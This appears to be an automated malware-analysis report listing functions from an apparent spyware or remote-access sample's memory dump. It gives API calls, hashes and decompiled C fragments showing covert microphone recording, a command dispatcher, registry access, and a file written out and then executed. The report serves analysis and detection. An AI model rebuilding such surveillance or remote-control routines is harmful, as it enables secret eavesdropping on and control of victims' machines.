                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                        • String ID:
                                        • API String ID: 2200674315-0
                                        • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                        • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                        • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                        • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004124BE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                        • time.MSVCRT ref: 004124E5
                                        • srand.MSVCRT ref: 004124F2
                                        • rand.MSVCRT ref: 00412506
                                        • rand.MSVCRT ref: 0041251A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        Strings
                                        • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                        • String ID: abcdefghijklmnopqrstuvwxyz
                                        • API String ID: 3357298394-1277644989
                                        • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                        • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                        • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                        • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B95B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                        • String ID: origmsc
                                        • API String ID: 643209241-68016026
                                        • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                        • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                        • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                        • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041290A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,69D8CB60,?,?,0041225E,?), ref: 00412919
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                        • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                        • String ID: ^"A
                                        • API String ID: 1083762089-1057680782
                                        • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                        • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                        • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                        • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411C4C, Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 15%
                                        			E00411C4C(void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _v36;
				char _v52;
				int _t21;
				signed int _t35;
				void* _t39;
				void* _t45;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t67 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
				_t21 = SetEvent( *(_t67 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t71 = _t69;
				_t45 = _t71;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t72 = _t71 + 0x24;
				_t61 =  *_t21 - 0x61;
				if(_t61 == 0) {
					_push(E0040180C( &_v20, __eflags, 2));
					_push(E0040180C( &_v20, __eflags, 1));
					_push(E0040180C( &_v20, __eflags, 0));
					_push(_t72 - 0x10);
					E00411D8A(E00412881(_t29));
				} else {
					_t62 = _t61 - 0x3d;
					if(_t62 == 0) {
						E00411A24(_t45);
					} else {
						_t63 = _t62 - 4;
						if(_t63 == 0) {
							_t35 = E0040180C( &_v20, __eflags, 0);
							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
							__eflags =  *_t35;
							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
						} else {
							_t64 = _t63 - 3;
							if(_t64 == 0) {
								_t39 =  *0x41c1d4;
								__eflags = _t39;
								if(_t39 != 0) {
									SetEvent(_t39);
								}
							} else {
								_t65 = _t64 - 1;
								if(_t65 == 0) {
									 *0x41c1d2 = 1;
								} else {
									if(_t65 == 1) {
										 *0x41c1d3 = 1;
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                        0x00411c4c
                                        0x00411c53
                                        0x00411c5e
                                        0x00411c6d
                                        0x00411c72
                                        0x00411c8a
                                        0x00411c9a
                                        0x00411ca0
                                        0x00411ca6
                                        0x00411ca9
                                        0x00411cb3
                                        0x00411cb8
                                        0x00411cbb
                                        0x00411cbe
                                        0x00411d3c
                                        0x00411d47
                                        0x00411d57
                                        0x00411d58
                                        0x00411d60
                                        0x00411cc0
                                        0x00411cc0
                                        0x00411cc3
                                        0x00411d2b
                                        0x00411cc5
                                        0x00411cc5
                                        0x00411cc8
                                        0x00411d03
                                        0x00411d0a
                                        0x00411d10
                                        0x00411d22
                                        0x00411cca
                                        0x00411cca
                                        0x00411ccd
                                        0x00411cee
                                        0x00411cf3
                                        0x00411cf5
                                        0x00411cf8
                                        0x00411cf8
                                        0x00411ccf
                                        0x00411ccf
                                        0x00411cd0
                                        0x00411ce5
                                        0x00411cd2
                                        0x00411cd3
                                        0x00411cd9
                                        0x00411cd9
                                        0x00411cd3
                                        0x00411cd0
                                        0x00411ccd
                                        0x00411cc8
                                        0x00411cc3
                                        0x00411d6b
                                        0x00411d73
                                        0x00411d7c
                                        0x00411d87

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                        • SetEvent.KERNEL32(?), ref: 00411C6D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00411C8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • SetEvent.KERNEL32(?), ref: 00411CF8
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                        • String ID:
                                        • API String ID: 3236006214-0
                                        • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                        • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                        • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                        • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401519, Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 47%
                                        			E00401519(WCHAR* __eax, void* __eflags) {
				char* _t4;
				signed int _t5;
				CHAR* _t10;
				signed int _t11;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t26;
				void* _t27;

				_t27 = __eflags;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				CreateDirectoryW(__eax, 0);
				0x41b218->wFormatTag = 1;
				 *0x41b21a = 1;
				 *0x41b21c = 0x1f40;
				 *0x41b226 = 8;
				 *0x41b220 = 0x1f40;
				 *0x41b224 = 1;
				 *0x41b228 = 0;
				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t5 = atoi(_t4);
				_t19 =  *0x41b21c; // 0x0
				 *_t26 = 0x30008;
				_t20 = _t19 * _t5 * 0x3c;
				 *0x41b1d0 = _t20;
				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				0x41b1a0->lpData = _t10;
				_t11 =  *0x41b1d8; // 0x0
				 *0x41b1a4 = _t11;
				 *0x41b1a8 = 0;
				 *0x41b1ac = 0;
				 *0x41b1b0 = 0;
				 *0x41b1b4 = 0;
				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				waveInStart( *0x41b210);
				return 0;
			}











                                        0x00401519
                                        0x00401523
                                        0x0040152a
                                        0x0040153c
                                        0x00401545
                                        0x0040154e
                                        0x00401553
                                        0x0040155c
                                        0x00401561
                                        0x0040156a
                                        0x00401571
                                        0x00401578
                                        0x0040157f
                                        0x00401588
                                        0x0040158e
                                        0x00401595
                                        0x004015b7
                                        0x004015bd
                                        0x004015c2
                                        0x004015d5
                                        0x004015dd
                                        0x004015eb
                                        0x004015f0
                                        0x004015fb
                                        0x00401600
                                        0x00401606
                                        0x0040160c
                                        0x00401612
                                        0x00401618
                                        0x00401627
                                        0x00401633
                                        0x0040163d

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                        • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                        • atoi.MSVCRT ref: 0040157F
                                        • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                        • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                        • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                        • waveInStart.WINMM ref: 00401633
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                        • String ID:
                                        • API String ID: 1097200658-0
                                        • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                        • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                        • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                        • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F153, Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                        • SetEvent.KERNEL32(?), ref: 0040F16D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040F18E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                          • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                          • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                          • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                          • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                          • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                          • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                          • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                          • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                          • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                          • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                          • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                          • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
